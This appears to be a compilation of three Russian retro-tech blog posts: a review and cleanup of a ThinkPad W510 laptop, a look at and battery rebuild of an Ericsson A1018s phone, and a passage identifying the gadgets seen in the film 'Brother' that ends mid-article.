Недавно у меня сбылась мечта и я нашел ноутбук в хорошем состоянии и в максимальнейшей комплектации: без всяких скидок вариант в конфигураторе проставлены все галочки. Это мобильная рабочая станция ThinkPad W510, выпущенная в 2010 году, а стало быть уже подходящая под мои критерии ретротехники. Несмотря на возраст, это до сих пор вполне пригодный к повседневному использованию ноутбук, благодаря 4-ядерному процессору и 16 гигабайтам оперативной памяти. Но дело не только в этом: уникальность моего экземпляра в том, что прокачать до схожего состояния базовый ноутбук точно не получится. Сегодня я расскажу об этом ноутбуке, и, заодно, попробую оценить произошедший за 10 с лишним лет прогресс.

Дневник коллекционера старых железок я веду в Телеграмме.

Начну нестандартно, с фотографий ноутбука по бокам. Оцените это богатство разъемов!



Так больше не делают! Два порта поддерживают еще не распространенный тогда интерфейс USB 3.0 (в гражданских ThinkPad T510 с таким же шасси были порты только второй версии). Один порт USB совмещен с eSATA. Есть порт FireWire, стандартный VGA и цифровой видеовыход DisplayPort.



Есть карт-ридер и даже слот для устройств ExpressCard 34. Но когда я увидел фотографию ноутбука с этого торца в объявлении, мне стало совсем интересно. Вместо оптического привода стоит заглушка, а это позволяет предположить, что тут не стандартная конфигурация ноутбука, а очень редкая версия с RAID-массивом из двух жестких дисков. Дело в том, что нельзя просто так взять и добавить RAID в экземпляр W510, в котором его изначально не было. Топовые версии комплектовались своей модификацией материнской платы с RAID-контроллером Intel.



А теперь формально спецификации устройства:

• Процессор Intel Core i7-920XM, четырехъядерный процессор первого поколения Intel Core i7 на базе архитектуры Nehalem и с техпроцессом 45нм. Базовая частота 2 Ггц, максимальная 3,2 Ггц.
• 16 гигабайт оперативной памяти DDR3, 4 модуля по 4 гигабайта.
• Дисковая система: массив RAID0 из двух SSD OCZ Vertex 250GB с интерфейсом SATA2
• Дисплей: 15,6 дюйма, 1920x1080, сенсорный, яркость 242 нит, контраст 500:1, 95% покрытие Adobe RGB
• Видеокарта: Nvidia Quadro 880M, 1ГБ видеопамяти
• Разъемы: 4xUSB (включая 2xUSB 3.0, 1xUSB+eSATA и еще один с постоянной подачей питания), Firewire 400, ExpressCard 34, VGA, DisplayPort, Gigabit Ethernet, модем, комбинированный джек аудио-микрофон.
• Беспроводные сети: WiFi Intel Centrino 6300 802.11abgn, Bluetooth 2.1, сотовая связь WWAN WCDMA+GPS
• Прочие фичи: Встроенный калибратор дисплея X-Rite, сканер отпечатков пальцев, веб-камера
• Габариты: 372x245x40мм
• Вес (со стандартной батареей): 2.57 кг

ThinkPad W510 относится к классу ноутбуков мобильная рабочая станция, его конкуренты Dell Precision, HP Zbook и Apple Macbook Pro. Эти ноутбуки производились с 2008 по 2015 год, сейчас наследником W510 является ThinkPad P1. С гражданским 15-дюймовым ноутбуком ThinkPad T510 у модели общий корпус, но доступные конфигурации гораздо богаче. И цена, соответственно, выше самая базовая конфигурация стоила около 1700 долларов. На сайте Overclockers.ru я нашел подробный обзор ноутбука в очень похожей конфигурации (но без тачскрина), там упоминается средняя стоимость в 120 тысяч рублей или (по тогдашнему курсу) примерно 4100 долларов ($4767 с учетом инфляции). Но это без сенсорного экрана, а главное с двумя обычными HDD на 320 гигабайт каждый, пусть и в конфигурации RAID0. Скорее всего, мой экземпляр был обновлен позднее, оригинальные жесткие диски были заменены на два SSD компании OCZ. Память скорее всего тоже нарастили позже, в 2010 году считалось, что и 8 гигабайт много.



На ноутбуке была установлена Windows 10, которую я безжалостно снес: это все-таки молодое ретро, и в первой жизни ноутбук работал под управлением Windows 7. На сайте archive.org я нашел образы трех DVD для восстановления системы, общие для T и W-серий 2010 года. Так как оптического привода в наличии нет, я загрузил их на внешний HDD Zalman с эмуляцией DVD-ROM. С него примерно за полтора часа я привел ноутбук в состояние только что из магазина: с оригинальной Windows 7 Pro и всем предустановленным софтом. Как полезным (утилита для работы с батареей), так и не очень (менеджер беспроводных соединений, полностью дублирующий функциональность ОС; утилита для обновления драйверов с сервера Lenovo, который уже давно выключили). Ну и с фирменными обоями:


W510 классический ThinkPad: в нем присутствуют все те фичи, за которые ноутбуки этой марки ценили, и которые позже, за ненадобностью и для большей компактности, потихоньку выпиливались. Механический замок крышки дисплея. Подсветка клавиатуры светодиодом сверху. Разъем для док-станции снизу. Здесь традиционная семирядная клавиатура с небольшими, относительно времен IBM, изменениями: высота кнопок Escape и Delete увеличена, изменена форма мультимедийных клавиш, добавлена полезная в коронавирусные времена отдельная кнопка выключения микрофона. В 15-дюймовый аппарат поместилась бы и полноценная клавиатура с цифровым блоком, но здесь его нет, по бокам динамики. Несмотря на то, что им отведено столько места, и ориентированы они прямо на пользователя, звук у W510 посредственный.



Вес под три килограмма и тяжелый блок питания на 135 Ватт (бывало и хуже) в 2010 году вопросов не вызывают: это же мощный ноутбук. К 2021-му научились делать компактные устройства с мощной начинкой, и по нынешним временам W510 натуральный кирпич, портативный в смысле можно перенести от одного рабочего места к другому, не более того. Не особо помогает и штатная 6-ячеечная батарея.



67 минут это в режиме ничего не происходит. Под нагрузкой аккумулятор можно посадить за полчаса. Сказываются прожорливый процессор, негибридная графическая подсистема, качественный, но неэкономный экран. Батарея в ноутбуке не менялась и после покупки показывала емкость в 30 ватт-часов из 56.



В утилите для работы с аккумулятором есть режим сброса батареи: когда она сначала разряжается до дна, а потом заряжается. Три таких процедуры подняли емкость до 43 Вт-ч, что вполне достаточно. Можно найти неоригинальную новую 9-ячеечную батарею, но какой смысл? Будет вместо часа автономной работы полтора. Так себе преимущество.

Производительность

По состоянию на 2010 год ThinkPad W510 ноутбук для избранных. Самые бюджетные модели, а также многочисленные нетбуки на тот момент имели и вовсе одноядерный процессор со смешной производительностью. По сравнению с хорошими двуядерными ноутбуками возникал интересный нюанс: при добавлении процессорных ядер пришлось серьезно уменьшить частоту. Самый скоростной Core i7 первого поколения с двумя ядрами имел частоту 2,8 Ггц (турбо до 3,46). Здесь же 2 гигагерца штатно, 3,2 в прыжке. В 2021 году W510 представляет собой пример крепкого пенсионера. Он вполне пригоден для повседневной работы, и даже справляется с множеством открытых вкладок в браузере за 10 лет веб из простой нагрузки для любых систем превратился в один из самых требовательных бенчмарков. Про мой X200 на базе Intel Core 2 Duo я такое сказать не могу: работает задумчиво.


Вот как это выглядит в объективных бенчмарках. 2405 баллов в однопоточном тесте Geekbench 4 это примерно на 40 процентов быстрее, чем процессор Intel Core 2 Duo P8800 с частотой 2.66 Ггц. В свою очередь, ноутбук ThinkPad T480 2018 года с процессором Intel Core i7-8550U выдает 5073 балла, почти ровно в два раза больше. В многопоточном тесте производительность 4 ядер 2010 года примерно соответствует возможностям ноутбука T430 c двуядерным Core i7 третьего поколения (2012 год).


В комплексном ретротесте PCMark7 ноутбук набрал 3418 баллов, на 37% больше, чем двуядерный X200 (2490) и, опять же, почти в два раза меньше, чем ThinkPad T480 (6654 балла). Кстати, а что нам дает RAID-массив из двух пожилых SSD?


Один SSD этого поколения должен выдавать 260 мегабайт в секунду в режиме линейного чтения и 160 в режиме записи. Преимущество от работы двух накопителей в режиме RAID0 определенно есть, хотя и не двукратное. В режиме записи мелкими блоками результат в одном тесте неожиданно низкий, что может быть особенностью как SSD, так и RAID-контроллера. Замена накопителей на современные наверняка поможет улучшить производительность, но вряд ли скажется на субъективной отзывчивости ноутбука. Двумя отсеками под 2,5-дюймовые накопители можно распорядиться по-другому: переключиться на надежный режим работы RAID1, или же разделить их: на одном диске система, на другом, потолще, данные. Если же оставить RAID0, получится интересное ретрорешение, обходящее ограничения интерфейса SATA2.

Will it run Crysis?

Очень условно. 27 FPS с высокими настройками графики и смешным разрешением 800x600. С нативным разрешением FullHD у меня получилось 10 кадров в секунду, или 38fps при самых базовых настройках качества картинки.


Видеокарта Nvidia Quadro FX 880M является аналогом GeForce GT 330M с заниженными частотами. Совсем недавно я тестировал десктопную видеокарту Radeon X850XT 2005 года. В бенчмарке 3DMark 05 она получила 6102 балла. На W510 в том же бенчмарке я получил результат в 13490 баллов. Сравнивать это можно даже не столько с современными видеокартами GeForce и Radeon. Интегрированное видео Intel в моем T480 показывает результат в 21600 баллов! Возможностей видеокарты в старом ноутбуке вряд ли будет достаточно даже для игр, выпущенных в районе 2010 года. А вот если отмотать еще лет на пять назад, то без проблем: Half-Life 2 с настройками High без проблем взлетает даже в FullHD.

Дисплей

Пожалуй, самая интересная особенность этого ноутбука. Матрица с диагональю 15,6 дюйма и разрешением 1920x1080 отличается прекрасной цветопередачей, достаточной яркостью и хорошими углами обзора, и при этом она не использует технологю IPS. Это TN+Film на стероидах. Но и это не все. В палмресте спрятан датчик встроенного калибратора X-Rite Huey Pro:



Вот так он выглядит с обратной стороны:



На ноутбуке установлена утилита, которая проводит калибровку и применяет цветокоррекцию:



Из-за этого W510 имеет дополнительный индикатор на крышке:



Работает это так: запускаете утилиту, закрываете крышку, на экране прогоняются тестовые паттерны, датчик замеряет корректность и вносит поправку. Утилита рекомендует проводить калибровку дисплея каждые две недели, и в результате вы по идее должны получить максимально корректное отображение цветов на дисплее, что крайне важно для работы с фото и видео. В тесте ноутбука с таким же экраном на сайте Notebookcheck есть подтверждение заявленных спецификаций по части яркости, контраста и, что самое главное, почти полного покрытия цветового пространства Adobe RGB.



Для меня самым важным оказалась не точность цветопередачи, а широкий диапазон. Разница очень заметна, особено если, как на фото выше, сравнить этот ноутбук с современной IPS-матрицей в Т480, у которой цветопередача как раз посредственная (54% sRGB). Очень яркая, сочная картинка слегка омрачена лишь крайне неравномерной подсветкой, что заметно только при просмотре очень темных изображений. А вот зачем сюда добавили тачскрин я, честно говоря, так и не понял. Возможно польза от него заключается в том, что он реагирует не только на касания пальцев, но может работать и со стилусом, которого в комплекте нет. При этом он дает больше бликов, чем матовый дисплей без сенсорного слоя.

Техобслуживание

Я примерно представляю, как сделать этот ноутбук еще лучше. Можно поменять SSD на современные, с заметно лучшими характеристиками. Заменить модули памяти и довести ее объем до 32 гигабайт. Поменять процессор на модель I7-940XM с частотой 2,13 Ггц, которая на этот ноутбук никогда не ставилась. Заменить клавиатуру и палмрест на новые, пока есть возможность их добыть. Всё это утроит стоимость ноутбука, но мало что даст с точки зрения производительности. Поэтому данный экземпляр пока останется в том виде, в котором был приобретен. Что не исключает небольшого обслуживания с чисткой системы охлаждения и заменой термопасты. Разбираем:



Переходник на жесткий диск SATA, вставляющийся в слот для оптического привода. В упомянутом выше обзоре на Overclockers автор решил, что вот эти резиновые накладки чья-то самодеятельность. Но нет, это заводской колхоз: высота привода 12,7 миллиметров, а кадди для HDD 9,5, и нужно было сделать так, чтобы жесткий диск не болтался.



Еще один SSD установлен в своем отсеке, рядом с ним на днище есть еще один люк для двух слотов под оперативную память. Еще два слота расположены под клавиатурой, которая, в традиционной для ThinkPad манере, крепится двумя винтами, легко снимается, и позволяет продуть систему охлаждения без разборки. Идем дальше:



Здесь видны беспроводные модули: Wi-Fi, Bluetooth и 3G. В следующей версии ThinkPad W520 можно было вместо 3G установить накопитель SSD mSATA.



Система охлаждения покрыта десятилетнем слоем пыли, но все не так плохо, как могло быть.



Термопаста тоже была не каменная. Перед разборкой запускаю стресс-тест в программе AIDA64, за 25 минут температура процессора поднимается до 89 градусов.



Чищу и продуваю сжатым воздухом радиаторы, наношу новую термопасту, собираю.



Заодно зубной щеткой вычищаю решетки динамиков и прочие сложные места на палмресте, чищу клавиатуру.



Последний шаг: меняю старую насадку на трекпоинт на новую, предпочитаемой формы. Глянец на кнопках не отмывается это уже стертая пластмасса.



Повторное тестирование, и есть результат! За те же 25 минут температура добралась до 82 градусов. Ноутбук все равно достаточно горячий: после работы под нагрузкой процессор еще час охлаждается до нормальных 50 градусов, и все это время вентилятор работает на повышенных оборотах.

Взгляд из 2021

Я получил в коллекцию ноутбук, которым вполне могу решать не-ретро задачи, например, писать эту статью, искать для нее материалы в сети и обрабатывать фотографии в Lightroom. Хотя за последние десять лет улучшение портативных ПК от года к году было малозаметным, накопленная разница оказалась большая. Даже максимально легкие ультрабуки сейчас показывают лучшую производительность. Современные мобильные рабочие станции оснащены процессорами с шестью и даже восемью ядрами. Игровые ноутбуки теперь умудряются делать в три раза тоньше, чем 10 лет назад.



Еще одно интересное изменение: в W510 был использован дисплей с соотношением сторон 16:9, хотя в предыдущей модели использовался экран 16:10. Этот даунгрейд мало чем был обоснован: ноутбук для дела, а экран у него чтобы удобнее было смотреть кино. Через 10 лет дисплеи 16:10 (а то и 3:2), предлагающие пользователю больше пространства по вертикали, начали потихоньку возвращаться. Да, исчезли почти все разъемы, но их сменил универсальный USB-С/Thunderbolt, передающий питание, видеосигнал, сеть и что угодно еще по одному кабелю. Для дисплеев на повестке дня теперь не только расширенная цветопередача и повышенная контрастность (для HDR), но и обновление с частотой больше 60. Прогресс все же происходит, пусть и не так как раньше.



Среди поклонников ноутбуков ThinkPad известно такое явление как "Франкенпад" ноутбук на базе ThinkPad T60, проапгрейженный по-максимуму. Долгое время это был последний, настоящий, торт мобильный компьютер с производительностью, достаточной для современных задач. Это больше не так: современный веб для старичка на Core 2 Duo тяжеловат. Мой W510 тоже торт (правда, широкоформатный), с отличной клавиатурой и экраном, но за счет четырех ядер и солидного объема памяти он еще держится. А за счет своей уникальной конфигурации он будет цениться как качественный артефакт из прошлого. Если не сломается. Первые 11 лет полет нормальный, посмотрим что будет дальше.

Смотришь на мобильники середины нулевых в кино и не понимаешь это вообще сотовый телефон или просто радиотрубка, беспроводной удлинитель телефона домашнего? Чем дальше забираешься в прошлое, тем увесистее артефакты, и к моему очередному ретроэкспонату это в полной мере относится. Если вам столько же лет, сколько мне, Ericson A1018s вполне мог быть вашим первым сотовым телефоном. Моим первым он не стал, но запомнился. Телефон выпущен в 1999 году, а в 2000 его рекламой была оклеена вся Москва. Шведский производитель, ныне занятый строго инфраструктурными проектами, сделал этот телефон так: взял устаревшие технологии из мобилок трехлетней давности, добавил получше экран, в последний момент прикрутил сменные цветные панельки Готово!



В 2021 году берешь этот аппарат в руки и удивляешься. Как так, вроде имеешь дело с телефоном, а всех дел по настройке вставить симку да зарядить аккумулятор. Не надо авторизовываться в облаках, скачивать приложения, переносить токены двухфакторной авторизации. Сам Ericsson в Швеции и сотовые операторы в России позиционировали A1018s как стильный, модный и молодежный. В переводе с маркетингового: это был дешевый телефон. Не особо выдающийся, но сделанный с умом и любовью. Ныне почти бесполезная, но все еще работающая штука, два десятилетия пролежавшая без дела, чтобы напомнить нам, какими были высокие технологии на рубеже двух тысячелетий.

Дневник коллекционера старых железок я веду в Телеграмме.

Цены



Сходим на архивный сайт Би Плюс, торговой марки сотового оператора Билайн для нищебродов потребителей нового типа. Сайт сверстан модно, практически вся информация передана картинками, большинство из них не сохранились, что несколько затрудняет раскопки. Тем не менее, есть ранняя версия раздела Оборудование с прайс-листом за февраль 2000 года. Нашего A1018s там пока нет, он появится только в версии за июнь, и стоит там 131 доллар (194 с учетом инфляции). Самый доступный мобильник в списке Motorola 3788, отличившийся возмутительным выпиливанием часов и будильника из прошивки.



В архиве Фидо на Google Groups можно найти объявление о продаже новых комплектов Би+ c A1018s за февраль 2001 года, по которому можно проследить снижение цены до 75 долларов. Там же упоминаются другие конкуренты на рынках дешевой связи: Philips Savvy DB, Motorola m3688. Это такое дно рынка мобильных телефонов, самые доступные модели, а для многих единственные доступные. А какие тогда были флагманы? Пожалуйста, самый дорогой лот со страницы сайта Би+ 2000 года: Ericsson T28s, 611 долларов (907 с учетом инфляции).



Элитная раскладушка, активный флип, открытием которого с кнопки можно было отвечать на звонки. Какие были отличия флагмана от бюджетной модели по функциональности? Никаких принципиальных, просто дорогим аппаратом удобнее пользоваться. У T28s больше памяти для хранения телефонных номеров. У A1018s нет виброзвонка, голосового управления и игр. Дисплей у T28s чуть более качественый. Собственно, всё. Мы сейчас говорим об эпохе до пакетных средств передачи данных, когда интернет через мобильник хоть и был возможен, но точно не был распространенным явлением. У тебя либо есть связь, либо ее нет. Остальное (например, помещается ли твой мобильник в карман) это мелочи. Наконец, оцените долгую жизнь модели: A1018s выходит в продажу в 1999 году, и окончательно пропадает с сайта того же Би+ только в феврале 2002 года, причем его сменяет практически идентичный римейк, модель A2628s.



Еще подборку брошюр тех времен я нашел в твиттере ValdikSS:



Батарея
Добыть телефон в оригинальной упаковке и в полном комплекте не составило труда. Их много, ломаться там особо нечему. Самое главное впечатление: насколько удобно этот телефон лежит в руке. Все нулевые мы сначала привыкали к миниатюрным моделям с флипом или в корпусе-раскладушке, потом растягивали ладони под лопаты современных смартфонов. A1018s по габаритам ближе всего к трубкам домашних телефонов, как поздних радио, так и ранних проводных. Второе впечатление: кнопки у него так себе. Никакого сравнения с более дорогими устройствами тех лет: никогда толком не поймешь, нажалась клавиша или нет. Третье: сменные панельки это какая-то профанация.



Реально, в чем смысл? Небольшая часть в основном черного кирпича превратилась из синей в фиолетовую, и что? Может быть мне так кажется, потому что я больше не молодежь? Четвертое впечатление: телефон не работает. Вовсе не включается от батареи, при работе от сети включается, но перезагружается при попытке совершить звонок. Я делаю предположение, что виной тому аккумуляторная батарея.



С устройством 1999 года выпуска все несколько сложнее, чем с более поздними. Просто так взять и купить аккумулятор на замену не выйдет: их никто не делает. Параметры у батареи нестандартные (4,8 вольта, 550 мАч), корпус тоже необычный: он по сути является частью корпуса телефона. Пришлось делать первый (для меня) ребилд: греть феном от паяльной станции аккмулятор по периметру и аккуратно разъединять две склеенные половинки корпуса.



Так это выглядит изнутри: просто четыре обычных аккумулятора ААА, соединенные последовательно, давно вышедшие из строя. Давайте посмотрим в рекламный буклет с аксессуарами:



Для A1018s существовало три вида батарей. Самая тонкая вообще не выходила за пределы корпуса телефона. Мой вариант средний, емкостью 550мАч, обеспечивал до 100 часов работы в режиме ожидания и 4 часа в режиме разговора. А самый толстый аккумулятор имел внутри четыре элемента АА и штатно увеличивал время ожидания до 185 часов. С современными пальчиковыми батарейками, думаю, можно сделать и больше.

Элементы в аккумуляторе были заменены на новые, после чего все было склеено и не без труда установлено на телефон: пластиковую крышку я все-таки немного помял. Несмотря на подросшую емкость аккумулятора, у меня не получилось добиться паспортных значений времени автономной работы вместо 100 часов в лучшем случае выходило 48, двое суток. Тем не менее, телефон заработал и работает надежно. Кстати, в тех же дешевых моторолах напрямую подразумевалась работа от батареек ААА, если основной аккумулятор сел. Если вам важно, чтобы телефон проработал 20 лет, это полезная фича.

Отдельный вопрос при эксплуатации в 2021 году: выбор оператора и даже SIM-карты. Операторы сотовой связи постепенно отказываются от поддержки стандартов сотовой связи второго поколения: именно к нему относятся поддерживаемые телефоном GSM 900/1800. В России 2G никогда не поддерживал оператор Tele2. В Европе оператор T-Mobile планировал выключить устаревшие стандарты в 2020 году, но из-за пандемии выключение пришлось перенести. Всего через несколько лет телефоны без поддержки 3G (а то и 4G) сравняются по своим возможностям с мобильниками стандартов DAMPS, NMT и прочих. В смысле, для их работы придется построить еще и собственную базовую станцию. В предыдущих статьях я также получал комментарии о неработоспособности новых сим-карт в старых устройствах. Сам с таким не сталкивался, но свои рабочие, ретро-френдли SIM-карты теперь стараюсь беречь.

Фичи
После обновления батареи я с радостью убедился, что телефон не залочен на европейского оператора, логотип которого нанесен на корпус. Европейские операторские телефоны часто попадались и в России: в 2001 году я купил в Евросети телефон Ericsson T20s в помятой коробке от провайдера Telenor. Что меня в A1018s удивило больше всего, так это поддержка русского языка из коробки.



Для устройств тех времен это вовсе не гарантировалось. Телефон умеет показывать по-русски и пункты меню, и SMS. Отправка коротких сообщений возможна только латиницей, что прямо указывалось в русскоязычной инструкции. Этот телефон застал введение первых дешевых тарифов на SMS (например, бесплатные сообщения внутри сети у того же Билайна), и поспособствовал созданию kultury translita в мобильных коммуникациях.



Правда встроенный в телефон русский шрифт по сравнению с латиницей ужасен, и я выключил перевод интерфейса.



Кроме приема и отправки SMS, других полезных фич у телефона немного: есть часы и можно установить будильник, имеется рудиментарная телефонная книга. Есть пара полезных тогда (но не сейчас) фишек: например, телефон может издавать сигнал по прошествии каждой минуты разговора. Учитывая, что бюджет минут в начале нулевых у меня был что-то типа не более 15 в месяц, это была важная функция. Другая устаревшая опция: сохранение номера оператора междугородних звонков, вместе с кодом доступа. 20 лет назад распространенной практикой было звонить по межгороду, набирая местный номер оператора связи, код карты оплаты и номер абонента. A1018s позволяет собрать этот пазл в два нажатия: сначала дозваниваемся до оператора, вводим код карты, потом вводим номер абонента. Естественно, поддерживаются все операторские фичи вроде переадресации и удержания вызова.



Брошюра рассказывает нам о наличии множества аксессуаров для этого телефона: от зарядной станции (одновременный заряд телефона и второй батареи) до проводного хендсфри.



Были два устройства для подключения к компьютеру: ИК-адаптер и прямое кабельное подключение через плату PCMCIA. Наконец, те, кому было мало сменных панелек, могли докупить еще.



Этого аксессуара в каталоге нет, но он подходит. A1018s стал одной из последних моделей до смены конструкции разъема: более поздние телефоны (T20s или же мой музейный T39s) со старыми аксессуарами были не совместимы. Об удобстве данной клавиатуры для набора SMS ничего сказать не могу, не пробовал. Но с ней связан логистический анекдот: примерно в 2001 году они были в огромных количествах доступны в салонах связи МТС, по смешной цене в 50 рублей.



Чехол
Вроде бы все успешно: я получил надежный, рабочий, приятный девайс для последующих экспериментов, но все же чего-то не хватало. В 2000 году мобильный телефон без чехла встречался в дикой природе крайне редко. Хорошей практикой было купить телефон, и сразу же приобрести к нему чехол. Он защищал от жестокой наружи дорогую ценную вещь. Сейчас я на такие повадки доисторических пользователей мобильной связи смотрю с сомнением. Понятно, почему я покупаю чехол сейчас, для своего нового флагманского смартфона. Смартфон как правило сделан из стекла и других хрупких материалов, и единственное неудачное падение может полностью вывести его из строя. Я не знаю, что надо сделать с A1018s, чтобы он перестал работать. Он весь собран на века.



Более того, не работает даже аргумент, что чехол позволяет носить телефон на ремне. В комплекте A1018s есть штатная клипса, с очень интересным креплением: из батареи вынимается резиновая заглушка, а туда вставляется подпружиненный захват. Но раз уж я занят переживанием устаревших впечатлений заново, надо добывать. Два чехла самой позорной конструкции дожидались меня двадцать лет, и приехали новые.



Вот теперь нормально. Из толстого бюджетного аппарата, имеющего все-таки свой стиль, получилось бесформенное нечто. Зато, когда придет пора продавать, я выну телефон из чехла и он будет как новенький!



И все же меня не оставляет ощущение, что дальнейшая эволюция мобильных устройств свернула куда-то не туда. Вот старый мобильник, у которого даже смена прошивки затруднена, и нет никакой возможности установить дополнительный софт. Добротный аппарат, где многое сделано для удобства пользователя. Перед выпуском устройства в продажу его создатели сделали все возможное, чтобы он пользовался спросом минимум три года, и был жив спустя двадцать лет. Ни одного патча или хотфикса для этого не потребовалось. Конечно это несправедливая мысль: объем кода для старого GSM-телефона и нового смартфона несопоставим. Набор решаемых задач совсем другой. И тем не менее, таких продуманных устройств, и даже просто программ, сейчас не хватает. И если вы совсем устанете от нашей смартфонной жизни, A1018s отличный вариант для цифрового детокса. Так, чтобы оставаться, на всякий случай, на связи, но чтобы не было под рукой девайса для прокрастинации. И тогда у вас будет выбор между двумя вариантами. Либо все-таки посмотреть широко раскрытыми глазами на красоту этого мира. Либо написать в телефоне в помощью встроенного редактора новую мелодию звонка.

Брат Алексея Балабанова не является моим любимым фильмом в смысле часто пересматриваю с семьей. Безусловно талантливое кино настолько хорошо передает пасмурную эпоху середины девяностых, что смотреть его попросту больно. Дело даже не в сюжетной канве, не в героях и смысле их поступков, а в деталях. Когда понимаешь, что у тебя в комнате были похожие обои, а у дедушки стояла такая же радиола. Атмосфера Брата она про приход новых времен, ценностей, вещей и людей. Даже если перемены безусловно к лучшему (а не как в фильме) все равно немного жаль. Через 23 года после премьеры фильм сам по себе стал капсулой времени, зафиксировал какую-то условную реальность, которая местами очень хорошо резонирует с моими собственными воспоминаниями. Точно могу сказать, что мне повезло, и мои девяностые были лучше, чем в кино.


Но есть еще один момент: если отвлечься от кровавой драмы, замечаешь как плотно в сюжет Брата интегрированы актуальные на тот момент технические новинки. Анализировать такое все равно, что идентифицировать марки машин и модели будильников в фильме Назад в будущее. Занятие несколько странное, но вполне имеющее право на жизнь, а у таких людей, как я, вообще основное. Недавно я пересмотрел Брата на быстрой перемотке, по возможности постарался определить модели попадающих в кадр устройств, а на основе этого сделать выводы, абсолютно никак не влияющие на впечатление от фильма. Переиздание фильма в HD доступно на Ютюбе, скриншоты взяты оттуда. Началось все с простого вопроса: а какой у Данилы Багрова был CD-плеер?

Дневник коллекционера старых железок я веду в Телеграмме.

Сначала обязательная привязка к датам. Фильм впервые показали на Каннском кинофестивале в мае 1997 года (данные по Википедии). В июне он вышел в прокат, причем сразу состоялся релиз на VHS предположу, что на выручку в кинотеатрах тогда было сложно расчитывать. В декабре 1997 года состоялся первый показ на телевидении. Я впервые увидел фильм в 1998 году в США, одолжил у кого-то из эмигрантской тусовки кассету, смотрел и страдал ностальгией по Родине, хотя поводов для этого в сюжете вроде и не было. Съемки происходили осенью 1996 года для наших дальнейших исследований это самое важное.


В самом начале фильма показан типичный, очень атмосферный ассортимент провинциального магазинчика формата всё, и еще кое-что. Домики для Барби, модель грузовой машины, видеокассета с Особенностями национальной охоты с глянцевой обложкой, и еще какая-то откровенная пиратка. Чистые VHS Maxell и RAKS, плохо различимая стопка компакт-дисков, по 20 тысяч рублей. Фильм снят до деноминации 1997 года, для перевода в современные рубли надо убрать три нолика. Диски откровенно пиратские, чуть позже мы узнаем, сколько стоили нормальные. Примета эпохи: ценники, сделанные с помощью советского трафарета.


На седьмой минуте в кадре появляется первый и последний компьютер, установленный в офисе криминального авторитета. На индикаторе указана частота 133 мегагерца, скорее всего это Pentium. На то, что это не AMD Am5x86 на той же частоте, также намекает плохо различимая наклейка Intel на корпусе. В комплекте с оптическим приводом получается неплохая система, которая в кабинете руководителя скорее всего используется как мебель или для пасьянса. На конец 1996 года самым крутым Пентуимом была бы версия на 200 мегагерц. Монитор сверхпопулярный Samsung SyncMaster 3ne: 14 дюймов, максимальное разрешение 1024x768.


Первое посещение магазина с музыкой и рок-атрибутикой. На заднем плане видеокассеты с концертами, легко угадываются Aerosmith Big Ones и Чёрный Пёс Петербург ДДТ. Цены на лицензионные CD: Этот 75800, а этот 78. Сопоставить ту стоимость с нынешними деньгами проще всего через курс доллара. По состоянию на 11 октября 1996 года один доллар стоил 5426 рублей, то есть за диск с музыкой Данила отдал около 14 баксов, с учетом инфляции $23,5. Можно еще проще: это была четверть тогдашней зарплаты в провинциальном бюджетном учреждении. В своей суровой реальности я не мог позволить ни фирму, ни пиратку на CD, а покупал пиратские же кассеты. Совершенно не помню, сколько они тогда стоили (если вы помните, подскажите), но кажется в пределах 4-6 тысяч рублей, то есть один доллар. Ах да, пиратские CD из провинциального магазина со скриншота выше обошлись бы в 3,7 доллара.


У того же магазина на 17-й минуте впервые можно разглядеть CD-плеер Данилы. Это Sony D-245, судя по дате в инструкции модель 1995 года. Аппарат среднего уровня, номера моделей самых дешевых дискмэнов Sony начинались на единичку, топовых на 3, 5 или 7. Вполне достойный аппарат со всем необходимым для полноценной эксплуатации. Антишок на три секунды (окей, модели чуть подороже с 10-секундным антишоком были удобнее), до 12 часов работы от одного комплекта батареек. Была возможность заряжать блок пальчиковых аккумуляторов прямо в плеере. Двухступенчатый усилитель басов и возможность подключения проводного пульта ДУ, который, правда, не входил в комплект. Чтобы сделать этот кинообзор чуть более осмысленным, я нашел и купил именно эту модель.


Увы, в нерабочем состоянии: на плате следы от потекших батареек, плеер не включается ни от них, ни от внешнего блока питания. Вместе с мобильными телефонами, плеер участвует в развитии сюжета, и мы к нему еще вернемся.


Первая встреча Данилы с братом. На столе лежит пока плохо идентифицируемый сотовый телефон.


Играет песня группы Наутилус Помпилиус. Здесь видно как CD-плеер закреплен на ремне у Данилы. Он явно организовал крепление самостоятельно, так как штатных средств для ношения на поясе у этой модели нет. Да и в целом для CD-портатива это не было принято.


Я уже в нулевые носил CD-проигрыватель либо в сумке, либо в большом внутреннем кармане куртки. Поэтому был важен проводной пульт: чтобы лишний раз не доставать сам проигрыватель или не искать наощупь кнопки.


Буквально на долю секунды в кадр попадает развал со свежей прессой, и тут есть много что интересного. Как минимум два журнала про хайфай, модное в те времена издание Птюч, вечная желтая пресса. И торчит уголок журнала Страна Игр, который с помощью коллег по ретрохобби я достаточно быстро идентифицировал. Это седьмой (с начала публикации) номер журнала за октябрь 1996 года. На сайте журнала есть архив обложек:


В интернет-архиве можно найти полный скан. Два разворота посвящены шутеру MDK это превью, релиз состоится в апреле 1997 года. Новости: в России начались официальные продажи Sony Playstation; 3DO уходит с рынка (продажи приставки 3DO Interactive Multiplayer остановлены, технологии проданы компании Matsushita); Sega, наоборот, инвестирует с разработку игр для актуальной тогда приставки Saturn. Nintendo выпускает новейшую 64-битную приставку Nintendo 64.


Системные требования из случайно выбранного обзора игры: 486-й процессор на 33 мегагерца, 8 мегабайт памяти, 15 мегабайт на жестком диске. Актуальная реклама:


Мобильник Nokia вроде бы похож на тот, что используется в фильме, но не совсем.




Несмотря на сомнительные (из 2021 года) дизайнерские решения, в журнале 1996 года очень приятная атмосфера. Но нам пора обратно в кино.


Данила покупает в палатке газету с объявлениями и звонит из телефона-автомата, договариваясь о съеме жилья. Ручкой вычеркивает неудачные варианты. Жизнь без интернета была непростая.


Данила катается с братом по хмурому Питеру на Lincoln Continental 1984 года (машина сохранилась, выкуплена с Ленфильма коллекционером).


Снова мелькает мобильник, по-прежнему плохо идентифицируемый. Понятно только, что у двух противобортствующих сторон в фильме телефоны одинаковые. Может он вообще у них был один на всех?


Зато плеер вновь показывают крупным планом. Если не знать о микроскопическом бюджете на съемки, можно предположить, что имел место продакт-плейсмент.


И еще одно камео телефона. На этом моменте я полез в поиск по картинкам с запросами типа телефон Nokia 1996, и нашел что-то очень похожее:


Но не то. Это Nokia 1610, GSM-телефон, выпущенный в апреле 1996 года. Но у него кнопки вызова и отбоя маленькие, а в фильме хорошо видно, как они занимают всю ширину передней панели.


